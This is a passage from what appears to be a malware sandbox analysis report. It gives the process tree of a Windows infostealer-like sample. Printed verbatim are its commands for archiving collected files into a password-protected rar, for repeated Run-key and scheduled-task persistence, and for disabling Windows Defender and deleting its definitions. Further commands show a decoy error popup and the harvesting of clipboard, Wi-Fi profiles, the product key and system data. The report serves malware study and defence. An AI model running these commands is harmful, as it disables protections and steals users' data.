        C:\Users\Admin\AppData\Local\Temp\_MEI31642\rar.exe
        
        C:\Users\Admin\AppData\Local\Temp\_MEI31642\rar.exe a -r -hp"Aquarius" "C:\Users\Admin\AppData\Local\Temp\WGArS.zip" *
        7⤵
        Executes dropped EXE
        
        PID:2468
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic os get Caption"
        6⤵
        
        PID:416
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic os get Caption
        7⤵
        
        PID:5580
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
        6⤵
        
        PID:4112
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic computersystem get totalphysicalmemory
        7⤵
        
        PID:5964
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
        6⤵
        
        PID:6012
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic csproduct get uuid
        7⤵
        
        PID:5888
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
        6⤵
        
        PID:4304
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:2436
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
        6⤵
        
        PID:4624
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path win32_VideoController get name
        7⤵
        Detects videocard installed
        
        PID:5504
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
        6⤵
        
        PID:5216
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
        7⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:3096
  - - C:\Windows\system32\WinBioData\WindowsDataUpdater.exe
      "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of SetWindowsHookEx
      Suspicious use of WriteProcessMemory
      PID:4388
    - - C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "WindowsDataUpdater" /sc ONLOGON /tr "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /rl HIGHEST /f
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:1700
  - - C:\Windows\system32\java.exe
      "C:\Windows\system32\java.exe"
      4⤵
      Checks computer location settings
      Executes dropped EXE
      Suspicious use of WriteProcessMemory
      PID:3460
    - - C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\C0C0.tmp\C0C1.tmp\C0E1.bat C:\Windows\system32\java.exe"
        5⤵
        Drops file in System32 directory
        Suspicious use of WriteProcessMemory
        
        PID:1964
      - C:\Windows\system32\timeout.exe
        
        timeout 1
        6⤵
        
        PID:3396
      - C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f
        6⤵
        
        PID:2056
      - C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f
        6⤵
        Adds Run key to start application
        
        PID:2544
      - C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f
        6⤵
        
        PID:2092
      - C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f
        6⤵
        
        PID:4260
      - C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        6⤵
        Executes dropped EXE
        
        PID:4200
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        7⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:3744
      - C:\Windows\system32\WinBioData\WindowsDataUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:1740
      - C:\Windows\system32\java.exe
        
        "C:\Windows\system32\java.exe"
        6⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:4540
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\D0CD.tmp\D0CE.tmp\D0CF.bat C:\Windows\system32\java.exe"
        7⤵
        Drops file in System32 directory
        
        PID:2452
        
        C:\Windows\system32\timeout.exe
        
        timeout 1
        8⤵
        Delays execution with timeout.exe
        
        PID:3708
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f
        8⤵
        
        PID:952
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f
        8⤵
        
        PID:3116
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f
        8⤵
        
        PID:4992
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f
        8⤵
        
        PID:3292
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        8⤵
        Executes dropped EXE
        
        PID:820
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        9⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:5292
        
        C:\Windows\system32\WinBioData\WindowsDataUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"
        8⤵
        Executes dropped EXE
        
        PID:2992
        
        C:\Windows\system32\java.exe
        
        "C:\Windows\system32\java.exe"
        8⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:1532
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\E07D.tmp\E07E.tmp\E07F.bat C:\Windows\system32\java.exe"
        9⤵
        
        PID:5508
        
        C:\Windows\system32\timeout.exe
        
        timeout 1
        10⤵
        Delays execution with timeout.exe
        
        PID:5872
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f
        10⤵
        
        PID:4176
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f
        10⤵
        
        PID:4408
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f
        10⤵
        
        PID:5384
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f
        10⤵
        
        PID:5408
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        10⤵
        Executes dropped EXE
        
        PID:5424
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        11⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:5680
        
        C:\Windows\system32\WinBioData\WindowsDataUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"
        10⤵
        Executes dropped EXE
        
        PID:5432
        
        C:\Windows\system32\java.exe
        
        "C:\Windows\system32\java.exe"
        10⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:2648
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\EA31.tmp\EA32.tmp\EA33.bat C:\Windows\system32\java.exe"
        11⤵
        
        PID:5796
        
        C:\Windows\system32\timeout.exe
        
        timeout 1
        12⤵
        Delays execution with timeout.exe
        
        PID:2972
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f
        12⤵
        
        PID:6116
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f
        12⤵
        
        PID:3592
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f
        12⤵
        Adds Run key to start application
        
        PID:5204
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f
        12⤵
        
        PID:5240
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        12⤵
        Executes dropped EXE
        
        PID:5212
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        13⤵
        Executes dropped EXE
        
        PID:3356
        
        C:\Windows\system32\WinBioData\WindowsDataUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"
        12⤵
        Executes dropped EXE
        
        PID:4176
        
        C:\Windows\system32\java.exe
        
        "C:\Windows\system32\java.exe"
        12⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:5260
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\F117.tmp\F118.tmp\F119.bat C:\Windows\system32\java.exe"
        13⤵
        Drops file in System32 directory
        
        PID:5592
        
        C:\Windows\system32\timeout.exe
        
        timeout 1
        14⤵
        
        PID:5748
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f
        14⤵
        Adds Run key to start application
        
        PID:2604
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f
        14⤵
        Adds Run key to start application
        
        PID:3028
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f
        14⤵
        
        PID:2968
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f
        14⤵
        
        PID:1264
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        14⤵
        Executes dropped EXE
        
        PID:820
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        15⤵
        Executes dropped EXE
        
        PID:3212
        
        C:\Windows\system32\WinBioData\WindowsDataUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"
        14⤵
        Executes dropped EXE
        
        PID:5824
        
        C:\Windows\system32\java.exe
        
        "C:\Windows\system32\java.exe"
        14⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:5672
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\F7BE.tmp\F7BF.tmp\F7C0.bat C:\Windows\system32\java.exe"
        15⤵
        
        PID:3188
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        16⤵
        
        PID:1276
        
        C:\Windows\system32\timeout.exe
        
        timeout 1
        16⤵
        
        PID:5720
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f
        16⤵
        
        PID:3192
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f
        16⤵
        
        PID:1384
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f
        16⤵
        
        PID:1556
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f
        16⤵
        
        PID:5556
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        16⤵
        Executes dropped EXE
        
        PID:3248
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        17⤵
        Executes dropped EXE
        
        PID:4788
        
        C:\Windows\system32\WinBioData\WindowsDataUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"
        16⤵
        Executes dropped EXE
        
        PID:3400
        
        C:\Windows\system32\java.exe
        
        "C:\Windows\system32\java.exe"
        16⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:4200
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\FF7E.tmp\FF7F.tmp\FF80.bat C:\Windows\system32\java.exe"
        17⤵
        
        PID:3356
        
        C:\Windows\system32\timeout.exe
        
        timeout 1
        18⤵
        Delays execution with timeout.exe
        
        PID:3452
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f
        18⤵
        
        PID:1740
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f
        18⤵
        Adds Run key to start application
        
        PID:3460
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f
        18⤵
        
        PID:4760
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f
        18⤵
        
        PID:5980
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        18⤵
        Executes dropped EXE
        
        PID:5064
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        19⤵
        Executes dropped EXE
        
        PID:5532
        
        C:\Windows\system32\WinBioData\WindowsDataUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"
        18⤵
        Executes dropped EXE
        
        PID:4948
        
        C:\Windows\system32\java.exe
        
        "C:\Windows\system32\java.exe"
        18⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:1368
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\6C1.tmp\6C2.tmp\6C3.bat C:\Windows\system32\java.exe"
        19⤵
        
        PID:4988
        
        C:\Windows\system32\timeout.exe
        
        timeout 1
        20⤵
        Delays execution with timeout.exe
        
        PID:3056
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f
        20⤵
        Adds Run key to start application
        
        PID:3680
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f
        20⤵
        
        PID:5748
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f
        20⤵
        
        PID:4828
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f
        20⤵
        
        PID:5772
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        20⤵
        Executes dropped EXE
        
        PID:3752
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        21⤵
        Executes dropped EXE
        
        PID:2252
        
        C:\Windows\system32\WinBioData\WindowsDataUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"
        20⤵
        Executes dropped EXE
        
        PID:5148
        
        C:\Windows\system32\java.exe
        
        "C:\Windows\system32\java.exe"
        20⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:1120
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\EEF.tmp\EF0.tmp\EF1.bat C:\Windows\system32\java.exe"
        21⤵
        Drops file in System32 directory
        
        PID:5980
        
        C:\Windows\system32\timeout.exe
        
        timeout 1
        22⤵
        Delays execution with timeout.exe
        
        PID:5940
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f
        22⤵
        Adds Run key to start application
        
        PID:5924
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f
        22⤵
        
        PID:5944
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f
        22⤵
        
        PID:2684
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f
        22⤵
        Adds Run key to start application
        
        PID:2988
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        22⤵
        Executes dropped EXE
        
        PID:2528
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        23⤵
        Executes dropped EXE
        
        PID:1824
        
        C:\Windows\system32\WinBioData\WindowsDataUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"
        22⤵
        Executes dropped EXE
        
        PID:5660
        
        C:\Windows\system32\java.exe
        
        "C:\Windows\system32\java.exe"
        22⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:5184
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\172D.tmp\172E.tmp\172F.bat C:\Windows\system32\java.exe"
        23⤵
        Drops file in System32 directory
        
        PID:5920
        
        C:\Windows\system32\timeout.exe
        
        timeout 1
        24⤵
        
        PID:636
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f
        24⤵
        
        PID:5396
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f
        24⤵
        
        PID:5760
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f
        24⤵
        
        PID:1576
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f
        24⤵
        
        PID:5628
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        24⤵
        Executes dropped EXE
        
        PID:1640
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        25⤵
        Drops file in Drivers directory
        Executes dropped EXE
        
        PID:5216
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe'"
        26⤵
        
        PID:1264
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        27⤵
        
        PID:5580
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe'
        27⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:4512
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
        26⤵
        
        PID:4112
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
        27⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:5972
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Could not open the file', 0, 'Error', 32+16);close()""
        26⤵
        
        PID:1528
        
        C:\Windows\system32\mshta.exe
        
        mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Could not open the file', 0, 'Error', 32+16);close()"
        27⤵
        
        PID:4992
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        26⤵
        
        PID:1736
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        27⤵
        Enumerates processes with tasklist
        
        PID:736
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
        26⤵
        
        PID:1740
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic csproduct get uuid
        27⤵
        
        PID:3348
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
        26⤵
        
        PID:1468
        
        C:\Windows\system32\reg.exe
        
        REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
        27⤵
        
        PID:3408
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
        26⤵
        
        PID:4408
        
        C:\Windows\system32\reg.exe
        
        REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
        27⤵
        
        PID:5636
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
        26⤵
        
        PID:6032
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path win32_VideoController get name
        27⤵
        Detects videocard installed
        
        PID:5976
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
        26⤵
        
        PID:4588
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path win32_VideoController get name
        27⤵
        Detects videocard installed
        
        PID:744
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        26⤵
        
        PID:2020
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        27⤵
        Enumerates processes with tasklist
        
        PID:5476
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        26⤵
        
        PID:3116
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        27⤵
        Enumerates processes with tasklist
        
        PID:3492
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
        26⤵
        
        PID:5356
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
        27⤵
        
        PID:5572
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
        26⤵
        Clipboard Data
        
        PID:1964
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-Clipboard
        27⤵
        Clipboard Data
        Suspicious behavior: EnumeratesProcesses
        
        PID:5804
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        26⤵
        
        PID:640
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        27⤵
        Enumerates processes with tasklist
        
        PID:5972
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        26⤵
        
        PID:2336
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        27⤵
        
        PID:6012
        
        C:\Windows\system32\tree.com
        
        tree /A /F
        27⤵
        
        PID:5860
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
        26⤵
        System Network Configuration Discovery: Wi-Fi Discovery
        
        PID:840
        
        C:\Windows\system32\netsh.exe
        
        netsh wlan show profile
        27⤵
        Event Triggered Execution: Netsh Helper DLL
        System Network Configuration Discovery: Wi-Fi Discovery
        
        PID:2852
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "systeminfo"
        26⤵
        
        PID:2792
        
        C:\Windows\system32\systeminfo.exe
        
        systeminfo
        27⤵
        Gathers system information
        
        PID:1464
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
        26⤵
        
        PID:3664
        
